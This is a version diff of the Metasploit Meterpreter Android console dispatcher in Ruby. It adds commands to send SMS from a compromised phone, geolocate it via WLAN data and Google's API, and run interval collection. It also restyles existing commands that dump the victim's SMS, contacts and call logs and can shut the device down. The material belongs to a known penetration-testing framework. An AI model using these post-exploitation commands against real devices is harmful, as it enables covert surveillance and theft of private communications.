rex 2.0.8 → 2.0.9

data/lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb

@@ -1,17 +1,17 @@
 # -*- coding: binary -*-
 require 'rex/post/meterpreter'
 require 'msf/core/auxiliary/report'
+require 'rex/google/geolocation'
+require 'date'
 
 module Rex
 module Post
 module Meterpreter
 module Ui
-
 ###
 # Android extension - set of commands to be executed on android devices.
 # extension by Anwar Mohamed (@anwarelmakrahy)
 ###
-
 class Console::CommandDispatcher::Android
   include Console::CommandDispatcher
   include Msf::Auxiliary::Report
@@ -26,33 +26,111 @@ class Console::CommandDispatcher::Android
       'geolocate'         => 'Get current lat-long using geolocation',
       'dump_calllog'      => 'Get call log',
       'check_root'        => 'Check if device is rooted',
-      'device_shutdown'   => 'Shutdown device'
+      'device_shutdown'   => 'Shutdown device',
+      'send_sms'          => 'Sends SMS from target session',
+      'wlan_geolocate'    => 'Get current lat-long using WLAN information',
+      'interval_collect'  => 'Manage interval collection capabilities'
     }
 
     reqs = {
-      'dump_sms'        => [ 'dump_sms' ],
-      'dump_contacts'   => [ 'dump_contacts' ],
-      'geolocate'       => [ 'geolocate' ],
-      'dump_calllog'    => [ 'dump_calllog' ],
-      'check_root'      => [ 'check_root' ],
-      'device_shutdown' => [ 'device_shutdown']
+      'dump_sms'         => ['dump_sms'],
+      'dump_contacts'    => ['dump_contacts'],
+      'geolocate'        => ['geolocate'],
+      'dump_calllog'     => ['dump_calllog'],
+      'check_root'       => ['check_root'],
+      'device_shutdown'  => ['device_shutdown'],
+      'send_sms'         => ['send_sms'],
+      'wlan_geolocate'   => ['wlan_geolocate'],
+      'interval_collect' => ['interval_collect']
     }
 
     # Ensure any requirements of the command are met
-    all.delete_if do |cmd, desc|
-      reqs[cmd].any? { |req| not client.commands.include?(req) }
+    all.delete_if do |cmd, _desc|
+      reqs[cmd].any? { |req| !client.commands.include?(req) }
     end
   end
 
-  def cmd_device_shutdown(*args)
+  def interval_collect_usage
+    print_line('Usage: interval_collect <parameters>')
+    print_line
+    print_line('Specifies an action to perform on a collector type.')
+    print_line
+    print_line(@@interval_collect_opts.usage)
+  end
+
+  def cmd_interval_collect(*args)
+      @@interval_collect_opts ||= Rex::Parser::Arguments.new(
+        '-h' => [false, 'Help Banner'],
+        '-a' => [true, "Action (required, one of: #{client.android.collect_actions.join(', ')})"],
+        '-c' => [true, "Collector type (required, one of: #{client.android.collect_types.join(', ')})"],
+        '-t' => [true, 'Collect poll timeout period in seconds (default: 30)']
+      )
+
+      opts = {
+        action:  nil,
+        type:    nil,
+        timeout: 30
+      }
+
+      @@interval_collect_opts.parse(args) do |opt, idx, val|
+        case opt
+        when '-a'
+          opts[:action] = val.downcase
+        when '-c'
+          opts[:type] = val.downcase
+        when '-t'
+          opts[:timeout] = val.to_i
+          opts[:timeout] = 30 if opts[:timeout] <= 0
+        end
+      end
+
+      unless client.android.collect_actions.include?(opts[:action])
+        interval_collect_usage
+        return
+      end
+
+      type = args.shift.downcase
+
+      unless client.android.collect_types.include?(opts[:type])
+        interval_collect_usage
+        return
+      end
+
+      result = client.android.interval_collect(opts)
+      if result[:headers].length > 0 && result[:entries].length > 0
+        header = "Captured #{opts[:type]} data"
+
+        if result[:timestamp]
+          time = Time.at(result[:timestamp]).to_datetime
+          header << " at #{time.strftime('%Y-%m-%d %H:%M:%S')}"
+        end
+
+        table = Rex::Ui::Text::Table.new(
+          'Header'    => header,
+          'SortIndex' => 0,
+          'Columns'   => result[:headers],
+          'Indent'    => 0
+        )
+
+        result[:entries].each do |e|
+          table << e
+        end
+
+        print_line
+        print_line(table.to_s)
+      else
+        print_good('Interval action completed successfully')
+      end
+  end
 
+  def cmd_device_shutdown(*args)
     seconds = 0
     device_shutdown_opts = Rex::Parser::Arguments.new(
       '-h' => [ false, 'Help Banner' ],
       '-t' => [ false, 'Shutdown after n seconds']
     )
 
-    device_shutdown_opts.parse(args) { | opt, idx, val |
+    device_shutdown_opts.parse(args) do |opt, _idx, val|
       case opt
       when '-h'
         print_line('Usage: device_shutdown [options]')
@@ -62,26 +140,25 @@ class Console::CommandDispatcher::Android
       when '-t'
         seconds = val.to_i
       end
-    }
+    end
 
     res = client.android.device_shutdown(seconds)
 
     if res
-      print_status("Device will shutdown #{seconds > 0 ?('after ' + seconds + ' seconds'):'now'}")
+      print_status("Device will shutdown #{seconds > 0 ? ('after ' + seconds + ' seconds') : 'now'}")
     else
       print_error('Device shutdown failed')
     end
   end
-  
-  def cmd_dump_sms(*args)
 
+  def cmd_dump_sms(*args)
     path = "sms_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
     dump_sms_opts = Rex::Parser::Arguments.new(
-        '-h' => [ false, 'Help Banner' ],
-        '-o' => [ false, 'Output path for sms list']
+      '-h' => [ false, 'Help Banner' ],
+      '-o' => [ false, 'Output path for sms list']
     )
 
-    dump_sms_opts.parse(args) { | opt, idx, val |
+    dump_sms_opts.parse(args) do |opt, _idx, val|
       case opt
       when '-h'
         print_line('Usage: dump_sms [options]')
@@ -91,19 +168,18 @@ class Console::CommandDispatcher::Android
       when '-o'
         path = val
       end
-    }
+    end
 
-    smsList = []
-    smsList = client.android.dump_sms
+    sms_list = client.android.dump_sms
 
-    if smsList.count > 0
-      print_status("Fetching #{smsList.count} sms #{smsList.count == 1? 'message': 'messages'}")
+    if sms_list.count > 0
+      print_status("Fetching #{sms_list.count} sms #{sms_list.count == 1 ? 'message' : 'messages'}")
       begin
         info = client.sys.config.sysinfo
 
         data = ""
         data << "\n=====================\n"
-        data << "[+] Sms messages dump\n"
+        data << "[+] SMS messages dump\n"
         data << "=====================\n\n"
 
         time = Time.new
@@ -112,8 +188,7 @@ class Console::CommandDispatcher::Android
         data << "Remote IP: #{client.sock.peerhost}\n"
         data << "Remote Port: #{client.sock.peerport}\n\n"
 
-        smsList.each_with_index { |a, index|
-
+        sms_list.each_with_index do |a, index|
           data << "##{index.to_i + 1}\n"
 
           type = 'Unknown'
@@ -147,14 +222,14 @@ class Console::CommandDispatcher::Android
           data << "Address\t: #{a['address']}\n"
           data << "Status\t: #{status}\n"
           data << "Message\t: #{a['body']}\n\n"
-        }
+        end
 
         ::File.write(path, data)
-        print_status("Sms #{smsList.count == 1? 'message': 'messages'} saved to: #{path}")
+        print_status("SMS #{sms_list.count == 1 ? 'message' : 'messages'} saved to: #{path}")
 
         return true
       rescue
-        print_error("Error getting messages: #{$!}")
+        print_error("Error getting messages: #{$ERROR_INFO}")
         return false
       end
     else
@@ -163,18 +238,15 @@ class Console::CommandDispatcher::Android
     end
   end
 
-
   def cmd_dump_contacts(*args)
-
     path = "contacts_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
-    dump_contacts_opts = Rex::Parser::Arguments.new(
 
+    dump_contacts_opts = Rex::Parser::Arguments.new(
       '-h' => [ false, 'Help Banner' ],
       '-o' => [ false, 'Output path for contacts list']
-
     )
 
-    dump_contacts_opts.parse(args) { | opt, idx, val |
+    dump_contacts_opts.parse(args) do |opt, _idx, val|
       case opt
       when '-h'
         print_line('Usage: dump_contacts [options]')
@@ -184,13 +256,12 @@ class Console::CommandDispatcher::Android
       when '-o'
         path = val
       end
-    }
+    end
 
-    contactList = []
-    contactList = client.android.dump_contacts
+    contact_list = client.android.dump_contacts
 
-    if contactList.count > 0
-      print_status("Fetching #{contactList.count} #{contactList.count == 1? 'contact': 'contacts'} into list")
+    if contact_list.count > 0
+      print_status("Fetching #{contact_list.count} #{contact_list.count == 1 ? 'contact' : 'contacts'} into list")
       begin
         info = client.sys.config.sysinfo
 
@@ -205,32 +276,28 @@ class Console::CommandDispatcher::Android
         data << "Remote IP: #{client.sock.peerhost}\n"
         data << "Remote Port: #{client.sock.peerport}\n\n"
 
-        contactList.each_with_index { |c, index|
+        contact_list.each_with_index do |c, index|
 
           data << "##{index.to_i + 1}\n"
           data << "Name\t: #{c['name']}\n"
 
-          if c['number'].count > 0
-            (c['number']).each { |n|
-              data << "Number\t: #{n}\n"
-            }
+          c['number'].each do |n|
+            data << "Number\t: #{n}\n"
           end
 
-          if c['email'].count > 0
-            (c['email']).each { |n|
-              data << "Email\t: #{n}\n"
-            }
+          c['email'].each do |n|
+            data << "Email\t: #{n}\n"
           end
 
           data << "\n"
-        }
-  
+        end
+
         ::File.write(path, data)
         print_status("Contacts list saved to: #{path}")
 
         return true
       rescue
-        print_error("Error getting contacts list: #{$!}")
+        print_error("Error getting contacts list: #{$ERROR_INFO}")
         return false
       end
     else
@@ -243,13 +310,11 @@ class Console::CommandDispatcher::Android
 
     generate_map = false
     geolocate_opts = Rex::Parser::Arguments.new(
-
       '-h' => [ false, 'Help Banner' ],
       '-g' => [ false, 'Generate map using google-maps']
-
     )
 
-    geolocate_opts.parse(args) { | opt, idx, val |
+    geolocate_opts.parse(args) do |opt, _idx, _val|
       case opt
       when '-h'
         print_line('Usage: geolocate [options]')
@@ -259,7 +324,7 @@ class Console::CommandDispatcher::Android
       when '-g'
         generate_map = true
       end
-    }
+    end
 
     geo = client.android.geolocate
 
@@ -278,7 +343,6 @@ class Console::CommandDispatcher::Android
   end
 
   def cmd_dump_calllog(*args)
-
     path = "calllog_dump_#{Time.new.strftime('%Y%m%d%H%M%S')}.txt"
     dump_calllog_opts = Rex::Parser::Arguments.new(
 
@@ -287,7 +351,7 @@ class Console::CommandDispatcher::Android
 
     )
 
-    dump_calllog_opts.parse(args) { | opt, idx, val |
+    dump_calllog_opts.parse(args) do |opt, _idx, val|
       case opt
       when '-h'
         print_line('Usage: dump_calllog [options]')
@@ -297,12 +361,12 @@ class Console::CommandDispatcher::Android
       when '-o'
         path = val
       end
-    }
+    end
 
     log = client.android.dump_calllog
 
     if log.count > 0
-      print_status("Fetching #{log.count} #{log.count == 1? 'entry': 'entries'}")
+      print_status("Fetching #{log.count} #{log.count == 1 ? 'entry' : 'entries'}")
       begin
         info = client.sys.config.sysinfo
 
@@ -317,23 +381,21 @@ class Console::CommandDispatcher::Android
         data << "Remote IP: #{client.sock.peerhost}\n"
         data << "Remote Port: #{client.sock.peerport}\n\n"
 
-        log.each_with_index { |a, index|
-
+        log.each_with_index do |a, index|
           data << "##{index.to_i + 1}\n"
-
           data << "Number\t: #{a['number']}\n"
           data << "Name\t: #{a['name']}\n"
           data << "Date\t: #{a['date']}\n"
           data << "Type\t: #{a['type']}\n"
           data << "Duration: #{a['duration']}\n\n"
-        }
+        end
 
         ::File.write(path, data)
         print_status("Call log saved to #{path}")
 
         return true
       rescue
-        print_error("Error getting call log: #{$!}")
+        print_error("Error getting call log: #{$ERROR_INFO}")
         return false
       end
     else
@@ -342,14 +404,13 @@ class Console::CommandDispatcher::Android
     end
   end
 
-
   def cmd_check_root(*args)
 
     check_root_opts = Rex::Parser::Arguments.new(
       '-h' => [ false, 'Help Banner' ]
     )
 
-    check_root_opts.parse(args) { | opt, idx, val |
+    check_root_opts.parse(args) do |opt, _idx, _val|
       case opt
       when '-h'
         print_line('Usage: check_root [options]')
@@ -357,26 +418,123 @@ class Console::CommandDispatcher::Android
         print_line(check_root_opts.usage)
         return
       end
-    }
+    end
 
     is_rooted = client.android.check_root
 
     if is_rooted
       print_good('Device is rooted')
-    elsif
+    else
       print_status('Device is not rooted')
     end
   end
 
+  def cmd_send_sms(*args)
+    send_sms_opts = Rex::Parser::Arguments.new(
+      '-h' => [ false, 'Help Banner' ],
+      '-d' => [ true, 'Destination number' ],
+      '-t' => [ true, 'SMS body text' ],
+      '-dr' => [ false, 'Wait for delivery report' ]
+    )
+
+    dest = ''
+    body = ''
+    dr = false
+
+    send_sms_opts.parse(args) do |opt, _idx, val|
+      case opt
+      when '-h'
+        print_line('Usage: send_sms -d <number> -t <sms body>')
+        print_line('Sends SMS messages to specified number.')
+        print_line(send_sms_opts.usage)
+        return
+      when '-d'
+        dest = val
+      when '-t'
+        body = val
+      when '-dr'
+        dr = true
+      end
+    end
+
+    if dest.blank? || body.blank?
+      print_error("You must enter both a destination address -d and the SMS text body -t")
+      print_error('e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."')
+      print_line(send_sms_opts.usage)
+      return
+    end
+
+    sent = client.android.send_sms(dest, body, dr)
+    if dr
+      if sent[0] == "Transmission successful"
+        print_good("SMS sent - #{sent[0]}")
+      else
+        print_error("SMS send failed - #{sent[0]}")
+      end
+      if sent[1] == "Transmission successful"
+        print_good("SMS delivered - #{sent[1]}")
+      else
+        print_error("SMS delivery failed - #{sent[1]}")
+      end
+    else
+      if sent == "Transmission successful"
+        print_good("SMS sent - #{sent}")
+      else
+        print_error("SMS send failed - #{sent}")
+      end
+    end
+  end
+
+  def cmd_wlan_geolocate(*args)
+    wlan_geolocate_opts = Rex::Parser::Arguments.new(
+      '-h' => [ false, 'Help Banner' ]
+    )
+
+    wlan_geolocate_opts.parse(args) do |opt, _idx, _val|
+      case opt
+      when '-h'
+        print_line('Usage: wlan_geolocate')
+        print_line('Tries to get device geolocation from WLAN information and Google\'s API')
+        print_line(wlan_geolocate_opts.usage)
+        return
+      end
+    end
+
+    log = client.android.wlan_geolocate
+    wlan_list = []
+    log.each do |x|
+      mac = x['bssid']
+      ssid = x['ssid']
+      ss = x['level']
+      wlan_list << [mac, ssid, ss.to_s]
+    end
+
+    if wlan_list.blank?
+      print_error("Unable to enumerate wireless networks from the target.  Wireless may not be present or enabled.")
+      return
+    end
+    g = Rex::Google::Geolocation.new
+
+    wlan_list.each do |wlan|
+      g.add_wlan(*wlan)
+    end
+    begin
+      g.fetch!
+    rescue RuntimeError => e
+      print_error("Error: #{e}")
+    else
+      print_status(g.to_s)
+      print_status("Google Maps URL:  #{g.google_maps_url}")
+    end
+  end
+
   #
   # Name for this dispatcher
   #
   def name
     'Android'
   end
-
 end
-
 end
 end
 end